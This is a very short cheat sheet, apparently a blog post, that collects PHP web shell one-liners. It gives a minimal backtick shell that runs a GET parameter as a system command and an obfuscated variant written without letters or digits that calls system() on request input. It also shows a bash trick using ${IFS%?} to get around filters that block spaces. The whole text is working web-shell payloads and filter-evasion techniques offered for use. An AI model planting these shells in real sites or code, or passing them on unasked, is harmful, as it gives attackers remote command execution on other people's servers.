Exploit by shell

Published: by Creative Commons Licence

PHP webshell

  • Beautiful: p0wny shell
  • Shortest:
    <?=`$_GET[1]`?>
    // .../shell.php?1=ls
    
  • Without a-zA-Z0-9:
    <?=$_='$<>/'^'\{\{\{\{';${$_}[_](${$_}[__]);
    // .../shell.php?_=system&__=ls
    

    Bash shell

  • Without space separated: cat${IFS%?}file.txt